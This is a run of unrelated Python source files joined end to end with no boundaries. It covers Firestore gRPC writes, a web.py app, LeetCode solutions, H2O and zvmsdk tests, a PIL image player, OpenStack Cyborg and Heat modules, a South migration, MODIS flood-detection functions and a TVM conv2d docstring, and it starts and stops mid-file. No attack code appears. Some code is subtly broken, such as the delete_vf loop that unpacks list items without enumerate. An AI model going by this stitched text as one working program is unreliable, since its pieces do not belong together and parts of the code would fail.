            value_ = document_pb2.Value(string_value = "foo_boo")
            update = document_pb2.Document(name=name, fields={"foo":value_})  
            writes  = write_pb2.Write(update_mask=common_pb2.DocumentMask(field_paths = ["foo"]), update=update)
            r2 = stub.Write(generate_messages(database, writes, response.stream_id, response.stream_token))
            for r in r2:
                print(r.write_results)

if __name__ == "__main__":
    main()

import sys
sys.path.append("helper")

import web
from helper import session


web.config.debug = False

urls = (
"/", "controller.start.index", 
"/1", "controller.start.one", 
"/2", "controller.start.two", 
)


app = web.application(urls, globals())
sessions = session.Sessions()


if __name__ == "__main__": 
	app.run()        



from typing import List
class Solution:
    def partitionLabels(self, S: str) -> List[int]:
        lastPos, seen, currMax = {}, set(), -1
        res = []
        for i in range(0, 26):
            c = chr(97+i)
            lastPos[c] = S.rfind(c)
        for i, c in enumerate(S):
            # Encounter new index higher than currMax
            if i > currMax:
                res.append(currMax+1)
            currMax = max(currMax, lastPos[c])
        res.append(len(S))
        ans = [res[i]-res[i-1] for i in range(1, len(res))]
        return ans
import sys
sys.path.insert(1,"../../../")
import h2o
from tests import pyunit_utils
from h2o.estimators.gbm import H2OGradientBoostingEstimator

def mnist_many_cols_gbm_large():
  train = h2o.import_file(path=pyunit_utils.locate("bigdata/laptop/mnist/train.csv.gz"))
  train.tail()


  gbm_mnist = H2OGradientBoostingEstimator(ntrees=1,
                                           max_depth=1,
                                           min_rows=10,
                                           learn_rate=0.01)
  gbm_mnist.train(x=range(784), y=784, training_frame=train)
  gbm_mnist.show()


if __name__ == "__main__":
  pyunit_utils.standalone_test(mnist_many_cols_gbm_large)
else:
  mnist_many_cols_gbm_large()

#!/Users/wuga/Documents/website/wuga/env/bin/python2.7
#
# The Python Imaging Library
# $Id$
#

from __future__ import print_function

import sys

if sys.version_info[0] > 2:
    import tkinter
else:
    import Tkinter as tkinter

from PIL import Image, ImageTk


# --------------------------------------------------------------------
# an image animation player

class UI(tkinter.Label):

    def __init__(self, master, im):
        if isinstance(im, list):
            # list of images
            self.im = im[1:]
            im = self.im[0]
        else:
            # sequence
            self.im = im

        if im.mode == "1":
            self.image = ImageTk.BitmapImage(im, foreground="white")
        else:
            self.image = ImageTk.PhotoImage(im)

        tkinter.Label.__init__(self, master, image=self.image, bg="black", bd=0)

        self.update()

        duration = im.info.get("duration", 100)
        self.after(duration, self.next)

    def next(self):

        if isinstance(self.im, list):

            try:
                im = self.im[0]
                del self.im[0]
                self.image.paste(im)
            except IndexError:
                return  # end of list

        else:

            try:
                im = self.im
                im.seek(im.tell() + 1)
                self.image.paste(im)
            except EOFError:
                return  # end of file

        duration = im.info.get("duration", 100)
        self.after(duration, self.next)

        self.update_idletasks()


# --------------------------------------------------------------------
# script interface

if __name__ == "__main__":

    if not sys.argv[1:]:
        print("Syntax: python player.py imagefile(s)")
        sys.exit(1)

    filename = sys.argv[1]

    root = tkinter.Tk()
    root.title(filename)

    if len(sys.argv) > 2:
        # list of images
        print("loading...")
        im = []
        for filename in sys.argv[1:]:
            im.append(Image.open(filename))
    else:
        # sequence
        im = Image.open(filename)

    UI(root, im).pack()

    root.mainloop()

# Copyright 2018 Huawei Technologies Co.,LTD.
# All Rights Reserved.
#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.

import copy
from oslo_log import log as logging
from oslo_versionedobjects import base as object_base

from cyborg.common import exception
from cyborg.db import api as dbapi
from cyborg.objects import base
from cyborg.objects import fields as object_fields
from cyborg.objects.deployable import Deployable
from cyborg.objects.virtual_function import VirtualFunction

LOG = logging.getLogger(__name__)


@base.CyborgObjectRegistry.register
class PhysicalFunction(Deployable):
    # Version 1.0: Initial version
    VERSION = '1.0'
    virtual_function_list = []

    def create(self, context):
        # To ensure the creating type is PF
        if self.type != 'pf':
            raise exception.InvalidDeployType()
        super(PhysicalFunction, self).create(context)

    def save(self, context):
        """In addition to save the pf, it should also save the
        vfs associated with this pf
        """
        # To ensure the saving type is PF
        if self.type != 'pf':
            raise exception.InvalidDeployType()

        for exist_vf in self.virtual_function_list:
            exist_vf.save(context)
        super(PhysicalFunction, self).save(context)

    def add_vf(self, vf):
        """add a vf object to the virtual_function_list.
        If the vf already exists, it will ignore,
        otherwise, the vf will be appended to the list
        """
        if not isinstance(vf, VirtualFunction) or vf.type != 'vf':
            raise exception.InvalidDeployType()
        for exist_vf in self.virtual_function_list:
            if base.obj_equal_prims(vf, exist_vf):
                LOG.warning("The vf already exists")
                return None
        vf.parent_uuid = self.uuid
        vf.root_uuid = self.root_uuid
        vf_copy = copy.deepcopy(vf)
        self.virtual_function_list.append(vf_copy)

    def delete_vf(self, context, vf):
        """remove a vf from the virtual_function_list
        if the vf does not exist, ignore it
        """
        for idx, exist_vf in self.virtual_function_list:
            if base.obj_equal_prims(vf, exist_vf):
                removed_vf = self.virtual_function_list.pop(idx)
                removed_vf.destroy(context)
                return
        LOG.warning("The removing vf does not exist!")

    def destroy(self, context):
        """Delete a the pf from the DB."""
        del self.virtual_function_list[:]
        super(PhysicalFunction, self).destroy(context)

    @classmethod
    def get(cls, context, uuid):
        """Find a DB Physical Function and return an Obj Physical Function.
        In addition, it will also finds all the Virtual Functions associated
        with this Physical Function and place them in virtual_function_list
        """
        db_pf = cls.dbapi.deployable_get(context, uuid)
        obj_pf = cls._from_db_object(cls(context), db_pf)
        pf_uuid = obj_pf.uuid

        query = {"parent_uuid": pf_uuid, "type": "vf"}
        db_vf_list = cls.dbapi.deployable_get_by_filters(context, query)

        for db_vf in db_vf_list:
            obj_vf = VirtualFunction.get(context, db_vf.uuid)
            obj_pf.virtual_function_list.append(obj_vf)
        return obj_pf

    @classmethod
    def get_by_filter(cls, context,
                      filters, sort_key='created_at',
                      sort_dir='desc', limit=None,
                      marker=None, join=None):
        obj_dpl_list = []
        filters['type'] = 'pf'
        db_dpl_list = cls.dbapi.deployable_get_by_filters(context, filters,
                                                          sort_key=sort_key,
                                                          sort_dir=sort_dir,
                                                          limit=limit,
                                                          marker=marker,
                                                          join_columns=join)
        for db_dpl in db_dpl_list:
            obj_dpl = cls._from_db_object(cls(context), db_dpl)
            query = {"parent_uuid": obj_dpl.uuid}
            vf_get_list = VirtualFunction.get_by_filter(context,
                                                        query)
            obj_dpl.virtual_function_list = vf_get_list
            obj_dpl_list.append(obj_dpl)
        return obj_dpl_list

    @classmethod
    def _from_db_object(cls, obj, db_obj):
        """Converts a physical function to a formal object.

        :param obj: An object of the class.
        :param db_obj: A DB model of the object
        :return: The object of the class with the database entity added
        """
        obj = Deployable._from_db_object(obj, db_obj)
        if cls is PhysicalFunction:
            obj.virtual_function_list = []
        return obj

class Solution:
    def isValidSerialization(self, preorder):
        """
        :type preorder: str
        :rtype: bool
        """
        arr_pre_order = preorder.split(',')
        
        stack = []
        for node in arr_pre_order:
            stack.append(node)
            while len(stack) > 1 and stack[-1] == '#' and stack[-2] == '#':
                stack.pop()
                stack.pop()
                if len(stack) < 1:
                    return False
                stack[-1] = '#'
                
        if len(stack) == 1 and stack[0] == '#':
            return True
        return False

#!/usr/bin/python
# -*- coding: utf-8 -*-
# Author: violinsolo
# Created on 08/03/2018

import tensorflow as tf
import numpy as np

x_shape = [5, 3, 3, 2]
x = np.arange(reduce(lambda t, s: t*s, list(x_shape), 1))

print x

x = x.reshape([5, 3, 3, -1])

print x.shape



X = tf.Variable(x)

with tf.Session() as sess:
    m = tf.nn.moments(X, axes=[0])
    # m = tf.nn.moments(X, axes=[0,1])
    # m = tf.nn.moments(X, axes=np.arange(len(x_shape)-1))
    mean, variance = m

    print(sess.run(m, feed_dict={X: x}))
    # print(sess.run(m, feed_dict={X: x}))
# -*- coding: utf-8 -*-
"""Template shortcut & filters"""
import os
import datetime
from jinja2 import Environment, FileSystemLoader

from uwsgi_sloth.settings import ROOT
from uwsgi_sloth import settings, __VERSION__

template_path = os.path.join(ROOT, 'templates')
env = Environment(loader=FileSystemLoader(template_path))

# Template filters

def friendly_time(msecs):
    secs, msecs = divmod(msecs, 1000)
    mins, secs = divmod(secs, 60)
    hours, mins = divmod(mins, 60)
    if hours:
        return '%dh%dm%ds' % (hours, mins, secs)
    elif mins:
        return '%dm%ds' % (mins, secs)
    elif secs:
        return '%ds%dms' % (secs, msecs)
    else:
        return '%.2fms' % msecs

env.filters['friendly_time'] = friendly_time


def render_template(template_name, context={}):
    template = env.get_template(template_name)
    context.update(
        SETTINGS=settings,
        now=datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'),
        version='.'.join(map(str, __VERSION__)))
    return template.render(**context)



# Copyright 2017,2018 IBM Corp.
#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.

import json
import mock
import unittest

from zvmsdk.sdkwsgi.handlers import version
from zvmsdk import version as sdk_version


class HandlersRootTest(unittest.TestCase):

    def setUp(self):
        pass

    def test_version(self):
        req = mock.Mock()
        ver_str = {"rc": 0,
                   "overallRC": 0,
                   "errmsg": "",
                   "modID": None,
                   "output":
                   {"api_version": version.APIVERSION,
                    "min_version": version.APIVERSION,
                    "version": sdk_version.__version__,
                    "max_version": version.APIVERSION,
                    },
                   "rs": 0}
        res = version.version(req)
        self.assertEqual('application/json', req.response.content_type)
        # version_json = json.dumps(ver_res)
        # version_str = utils.to_utf8(version_json)
        ver_res = json.loads(req.response.body.decode('utf-8'))
        self.assertEqual(ver_str, ver_res)
        self.assertEqual('application/json', res.content_type)

# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models

class Migration(SchemaMigration):

    def forwards(self, orm):
        
        # Adding model 'Journey'
        db.create_table('places_journey', (
            ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('route', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['places.Route'])),
            ('external_ref', self.gf('django.db.models.fields.TextField')()),
            ('notes', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
            ('runs_on_monday', self.gf('django.db.models.fields.BooleanField')(default=False)),
            ('runs_on_tuesday', self.gf('django.db.models.fields.BooleanField')(default=False)),
            ('runs_on_wednesday', self.gf('django.db.models.fields.BooleanField')(default=False)),
            ('runs_on_thursday', self.gf('django.db.models.fields.BooleanField')(default=False)),
            ('runs_on_friday', self.gf('django.db.models.fields.BooleanField')(default=False)),
            ('runs_on_saturday', self.gf('django.db.models.fields.BooleanField')(default=False)),
            ('runs_on_sunday', self.gf('django.db.models.fields.BooleanField')(default=False)),
            ('runs_in_termtime', self.gf('django.db.models.fields.BooleanField')(default=False)),
            ('runs_in_school_holidays', self.gf('django.db.models.fields.BooleanField')(default=False)),
            ('runs_on_bank_holidays', self.gf('django.db.models.fields.BooleanField')(default=False)),
            ('runs_on_non_bank_holidays', self.gf('django.db.models.fields.BooleanField')(default=False)),
            ('runs_from', self.gf('django.db.models.fields.DateField')()),
            ('runs_until', self.gf('django.db.models.fields.DateField')()),
            ('vehicle', self.gf('django.db.models.fields.TextField')()),
        ))
        db.send_create_signal('places', ['Journey'])

        # Adding model 'ScheduledStop'
        db.create_table('places_scheduledstop', (
            ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('entity', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['places.Entity'])),
            ('journey', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['places.Journey'])),
            ('order', self.gf('django.db.models.fields.IntegerField')()),
            ('sta', self.gf('django.db.models.fields.TimeField')(null=True, blank=True)),
            ('std', self.gf('django.db.models.fields.TimeField')(null=True, blank=True)),
            ('times_estimated', self.gf('django.db.models.fields.BooleanField')(default=False)),
            ('fare_stage', self.gf('django.db.models.fields.BooleanField')(default=False)),
            ('activity', self.gf('django.db.models.fields.CharField')(default='B', max_length=1)),
        ))
        db.send_create_signal('places', ['ScheduledStop'])


    def backwards(self, orm):
        
        # Deleting model 'Journey'
        db.delete_table('places_journey')

        # Deleting model 'ScheduledStop'
        db.delete_table('places_scheduledstop')


    models = {
        'places.entity': {
            'Meta': {'object_name': 'Entity'},
            '_identifiers': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['places.Identifier']", 'symmetrical': 'False'}),
            '_metadata': ('django.db.models.fields.TextField', [], {'default': "'{}'"}),
            'absolute_url': ('django.db.models.fields.TextField', [], {}),
            'all_types': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'entities'", 'blank': 'True', 'to': "orm['places.EntityType']"}),
            'all_types_completion': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'entities_completion'", 'blank': 'True', 'to': "orm['places.EntityType']"}),
            'geometry': ('django.contrib.gis.db.models.fields.GeometryField', [], {'null': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['places.EntityGroup']", 'symmetrical': 'False'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'identifier_scheme': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
            'identifier_value': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
            'is_stack': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_sublocation': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'location': ('django.contrib.gis.db.models.fields.PointField', [], {'null': 'True'}),
            'parent': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['places.Entity']", 'null': 'True'}),
            'primary_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['places.EntityType']", 'null': 'True'}),
            'source': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['places.Source']"})
        },
        'places.entitygroup': {
            'Meta': {'object_name': 'EntityGroup'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'ref_code': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
            'source': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['places.Source']"})
        },
        'places.entitygroupname': {
            'Meta': {'unique_together': "(('entity_group', 'language_code'),)", 'object_name': 'EntityGroupName'},
            'entity_group': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'names'", 'to': "orm['places.EntityGroup']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'language_code': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
            'title': ('django.db.models.fields.TextField', [], {})
        },
        'places.entityname': {
            'Meta': {'unique_together': "(('entity', 'language_code'),)", 'object_name': 'EntityName'},
            'entity': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'names'", 'to': "orm['places.Entity']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'language_code': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
            'title': ('django.db.models.fields.TextField', [], {})
        },
        'places.entitytype': {
            'Meta': {'object_name': 'EntityType'},
            'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['places.EntityTypeCategory']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'note': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'show_in_category_list': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'show_in_nearby_list': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'}),
            'subtype_of': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'subtypes'", 'blank': 'True', 'to': "orm['places.EntityType']"}),
            'subtype_of_completion': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'subtypes_completion'", 'blank': 'True', 'to': "orm['places.EntityType']"})
        },
        'places.entitytypecategory': {
            'Meta': {'object_name': 'EntityTypeCategory'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.TextField', [], {})
        },
        'places.entitytypename': {
            'Meta': {'unique_together': "(('entity_type', 'language_code'),)", 'object_name': 'EntityTypeName'},
            'entity_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'names'", 'to': "orm['places.EntityType']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'language_code': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
            'verbose_name': ('django.db.models.fields.TextField', [], {}),
            'verbose_name_plural': ('django.db.models.fields.TextField', [], {}),
            'verbose_name_singular': ('django.db.models.fields.TextField', [], {})
        },
        'places.identifier': {
            'Meta': {'object_name': 'Identifier'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'scheme': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
            'value': ('django.db.models.fields.CharField', [], {'max_length': '256'})
        },
        'places.journey': {
            'Meta': {'object_name': 'Journey'},
            'external_ref': ('django.db.models.fields.TextField', [], {}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'notes': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'route': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['places.Route']"}),
            'runs_from': ('django.db.models.fields.DateField', [], {}),
            'runs_in_school_holidays': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'runs_in_termtime': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'runs_on_bank_holidays': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'runs_on_friday': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'runs_on_monday': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'runs_on_non_bank_holidays': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'runs_on_saturday': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'runs_on_sunday': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'runs_on_thursday': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'runs_on_tuesday': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'runs_on_wednesday': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'runs_until': ('django.db.models.fields.DateField', [], {}),
            'vehicle': ('django.db.models.fields.TextField', [], {})
        },
        'places.route': {
            'Meta': {'object_name': 'Route'},
            'external_ref': ('django.db.models.fields.TextField', [], {}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'operator': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'service_id': ('django.db.models.fields.TextField', [], {}),
            'service_name': ('django.db.models.fields.TextField', [], {'null': 'True'}),
            'stops': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['places.Entity']", 'through': "orm['places.StopOnRoute']", 'symmetrical': 'False'})
        },
        'places.scheduledstop': {
            'Meta': {'ordering': "['order']", 'object_name': 'ScheduledStop'},
            'activity': ('django.db.models.fields.CharField', [], {'default': "'B'", 'max_length': '1'}),
            'entity': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['places.Entity']"}),
            'fare_stage': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'journey': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['places.Journey']"}),
            'order': ('django.db.models.fields.IntegerField', [], {}),
            'sta': ('django.db.models.fields.TimeField', [], {'null': 'True', 'blank': 'True'}),
            'std': ('django.db.models.fields.TimeField', [], {'null': 'True', 'blank': 'True'}),
            'times_estimated': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
        },
        'places.source': {
            'Meta': {'object_name': 'Source'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'last_updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'module_name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '128'})
        },
        'places.stoponroute': {
            'Meta': {'ordering': "['order']", 'object_name': 'StopOnRoute'},
            'entity': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['places.Entity']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'order': ('django.db.models.fields.IntegerField', [], {}),
            'route': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['places.Route']"})
        }
    }

    complete_apps = ['places']

# -----------------------------------------------------------------------------
# Copyright * 2014, United States Government, as represented by the
# Administrator of the National Aeronautics and Space Administration. All
# rights reserved.
#
# The Crisis Mapping Toolkit (CMT) v1 platform is licensed under the Apache
# License, Version 2.0 (the "License"); you may not use this file except in
# compliance with the License. You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
# -----------------------------------------------------------------------------

import ee
import math

from cmt.mapclient_qt import addToMap
from cmt.util.miscUtilities import safe_get_info
import modis_utilities

'''
Contains implementations of several simple MODIS-based flood detection algorithms.
'''

#==============================================================


def dem_threshold(domain, b):
    '''Just use a height threshold on the DEM!'''

    heightLevel = float(domain.algorithm_params['dem_threshold'])
    dem         = domain.get_dem().image
    return dem.lt(heightLevel).select(['elevation'], ['b1'])


#==============================================================

def evi(domain, b):
    '''Simple EVI based classifier'''
    #no_clouds = b['b3'].lte(2100).select(['sur_refl_b03'], ['b1'])
    criteria1 = b['EVI'].lte(0.3).And(b['LSWI'].subtract(b['EVI']).gte(0.05)).select(['sur_refl_b02'], ['b1'])
    criteria2 = b['EVI'].lte(0.05).And(b['LSWI'].lte(0.0)).select(['sur_refl_b02'], ['b1'])
    #return no_clouds.And(criteria1.Or(criteria2))
    return criteria1.Or(criteria2)

def xiao(domain, b):
    '''Method from paper: Xiao, Boles, Frolking, et. al. Mapping paddy rice agriculture in South and Southeast Asia using
                          multi-temporal MODIS images, Remote Sensing of Environment, 2006.
                          
        This method implements a very simple decision tree from several standard MODIS data products.
        The default constants were tuned for (wet) rice paddy detection.
    '''
    return b['LSWI'].subtract(b['NDVI']).gte(0.05).Or(b['LSWI'].subtract(b['EVI']).gte(0.05)).select(['sur_refl_b02'], ['b1']);


#==============================================================

def get_diff(b):
    '''Just the internals of the difference method'''
    return b['b2'].subtract(b['b1']).select(['sur_refl_b02'], ['b1'])

def diff_learned(domain, b):
    '''modis_diff but with the threshold calculation included (training image required)'''
    if domain.unflooded_domain == None:
        print('No unflooded training domain provided.')
        return None
    unflooded_b = modis_utilities.compute_modis_indices(domain.unflooded_domain)
    water_mask  = modis_utilities.get_permanent_water_mask()
    
    threshold = modis_utilities.compute_binary_threshold(get_diff(unflooded_b), water_mask, domain.bounds)
    return modis_diff(domain, b, threshold)

def modis_diff(domain, b, threshold=None):
    '''Compute (b2-b1) < threshold, a simple water detection index.
    
       This method may be all that is needed in cases where the threshold can be hand tuned.
    '''
    if threshold == None: # If no threshold value passed in, load it based on the data set.
        threshold = float(domain.algorithm_params['modis_diff_threshold'])
    return get_diff(b).lte(threshold)

#==============================================================

def get_dartmouth(b):
    A = 500
    B = 2500
    return b['b2'].add(A).divide(b['b1'].add(B)).select(['sur_refl_b02'], ['b1'])

def dart_learned(domain, b):
    '''The dartmouth method but with threshold calculation included (training image required)'''
    if domain.unflooded_domain == None:
        print('No unflooded training domain provided.')
        return None
    unflooded_b = modis_utilities.compute_modis_indices(domain.unflooded_domain)
    water_mask  = modis_utilities.get_permanent_water_mask()
    threshold   = modis_utilities.compute_binary_threshold(get_dartmouth(unflooded_b), water_mask, domain.bounds)
    return dartmouth(domain, b, threshold)

def dartmouth(domain, b, threshold=None):
    '''A flood detection method from the Dartmouth Flood Observatory.
    
        This method is a refinement of the simple b2-b1 detection method.
    '''
    if threshold == None:
        threshold = float(domain.algorithm_params['dartmouth_threshold'])
    return get_dartmouth(b).lte(threshold)

#==============================================================

def get_mod_ndwi(b):
    return b['b6'].subtract(b['b4']).divide(b['b4'].add(b['b6'])).select(['sur_refl_b06'], ['b1'])

def mod_ndwi_learned(domain, b):
    if domain.unflooded_domain == None:
        print('No unflooded training domain provided.')
        return None
    unflooded_b = modis_utilities.compute_modis_indices(domain.unflooded_domain)
    water_mask  = modis_utilities.get_permanent_water_mask()
    threshold   = modis_utilities.compute_binary_threshold(get_mod_ndwi(unflooded_b), water_mask, domain.bounds)
    return mod_ndwi(domain, b, threshold)

def mod_ndwi(domain, b, threshold=None):
    if threshold == None:
        threshold = float(domain.algorithm_params['mod_ndwi_threshold'])
    return get_mod_ndwi(b).lte(threshold)

#==============================================================

def get_fai(b):
    '''Just the internals of the FAI method'''
    return b['b2'].subtract(b['b1'].add(b['b5'].subtract(b['b1']).multiply((859.0 - 645) / (1240 - 645)))).select(['sur_refl_b02'], ['b1'])

def fai_learned(domain, b):
    if domain.unflooded_domain == None:
        print('No unflooded training domain provided.')
        return None
    unflooded_b = modis_utilities.compute_modis_indices(domain.unflooded_domain)
    water_mask  = modis_utilities.get_permanent_water_mask()
    
    threshold = modis_utilities.compute_binary_threshold(get_fai(unflooded_b), water_mask, domain.bounds)
    return fai(domain, b, threshold)

def fai(domain, b, threshold=None):
    ''' Floating Algae Index. Method from paper: Feng, Hu, Chen, Cai, Tian, Gan,
    Assessment of inundation changes of Poyang Lake using MODIS observations
    between 2000 and 2010. Remote Sensing of Environment, 2012.
    '''
    if threshold == None:
        threshold = float(domain.algorithm_params['fai_threshold'])
    return get_fai(b).lte(threshold)

# -*- coding:utf-8 -*-
__author__ = 'q00222219@huawei'

import time
from heat.openstack.common import log as logging

import heat.engine.resources.cloudmanager.commonutils as commonutils
import heat.engine.resources.cloudmanager.constant as constant
import heat.engine.resources.cloudmanager.exception as exception
import pdb

LOG = logging.getLogger(__name__)


class CascadedConfiger(object):
    def __init__(self, public_ip_api, api_ip, domain, user, password,
                 cascading_domain, cascading_api_ip, cascaded_domain,
                 cascaded_api_ip, cascaded_api_subnet_gateway):
        self.public_ip_api = public_ip_api
        self.api_ip = api_ip
        self.domain = domain
        self.user = user
        self.password = password
        self.cascading_domain = cascading_domain
        self.cascading_api_ip = cascading_api_ip
        self.cascaded_domain = cascaded_domain
        self.cascaded_ip = cascaded_api_ip
        self.gateway = cascaded_api_subnet_gateway

    def do_config(self):
        start_time = time.time()
        #pdb.set_trace()
        LOG.info("start config cascaded, cascaded: %s" % self.domain)
        # wait cascaded tunnel can visit
        commonutils.check_host_status(host=self.public_ip_api,
                                      user=self.user,
                                      password=self.password,
                                      retry_time=500, interval=1)

        # config cascaded host
        self._config_az_cascaded()

        cost_time = time.time() - start_time
        LOG.info("first config success,  cascaded: %s, cost time: %d"
                    % (self.domain, cost_time))

        # check config result
        for i in range(3):
            try:
                # check 90s
                commonutils.check_host_status(
                    host=self.public_ip_api,
                    user=constant.VcloudConstant.ROOT,
                    password=constant.VcloudConstant.ROOT_PWD,
                    retry_time=15,
                    interval=1)
                LOG.info("cascaded api is ready..")
                break
            except exception.CheckHostStatusFailure:
                if i == 2:
                    LOG.error("check cascaded api failed ...")
                    break
                LOG.error("check cascaded api error, "
                             "retry config cascaded ...")
                self._config_az_cascaded()

        cost_time = time.time() - start_time
        LOG.info("config cascaded success, cascaded: %s, cost_time: %d"
                    % (self.domain, cost_time))

    def _config_az_cascaded(self):
        LOG.info("start config cascaded host, host: %s" % self.api_ip)
        # modify dns server address
        address = "/%(cascading_domain)s/%(cascading_ip)s,/%(cascaded_domain)s/%(cascaded_ip)s" \
                  % {"cascading_domain": self.cascading_domain,
                     "cascading_ip": self.cascading_api_ip,
                     "cascaded_domain":self.cascaded_domain,
                     "cascaded_ip":self.cascaded_ip}
        for i in range(30):
            try:
                commonutils.execute_cmd_without_stdout(
                    host=self.public_ip_api,
                    user=self.user,
                    password=self.password,
                    cmd='cd %(dir)s; source /root/adminrc; sh %(script)s replace %(address)s'
                        % {"dir": constant.PublicConstant.SCRIPTS_DIR,
                           "script": constant.PublicConstant.
                               MODIFY_DNS_SERVER_ADDRESS,
                           "address": address})
                break
            except exception.SSHCommandFailure as e:
                LOG.error("modify cascaded dns address error, cascaded: "
                             "%s, error: %s"
                             % (self.domain, e.format_message()))
                time.sleep(1)

        LOG.info(
            "config cascaded dns address success, cascaded: %s"
            % self.public_ip_api)

        return True



"""Neural network operations."""
from __future__ import absolute_import as _abs
from . import _make


def conv2d(data,
           weight,
           strides=(1, 1),
           padding=(0, 0),
           dilation=(1, 1),
           groups=1,
           channels=None,
           kernel_size=None,
           data_layout="NCHW",
           weight_layout="OIHW",
           out_layout="",
           out_dtype=""):
    r"""2D convolution.

    This operator takes the weight as the convolution kernel
    and convolves it with data to produce an output.


    In the default case, where the data_layout is `NCHW`
    and weight_layout is `OIHW`, conv2d takes in
    a data Tensor with shape `(batch_size, in_channels, height, width)`,
    and a weight Tensor with shape `(channels, in_channels, kernel_size[0], kernel_size[1])`
    to produce an output Tensor with the following rule:

    .. math::

        \mbox{out}[b, c, y, x] = \sum_{dy, dx, k}
           \mbox{data}[b, k, \mbox{strides}[0] * y  + dy, \mbox{strides}[1] * x + dx] *
           \mbox{weight}[c, k, dy, dx]

    Padding and dilation are applied to data and weight respectively before the computation.
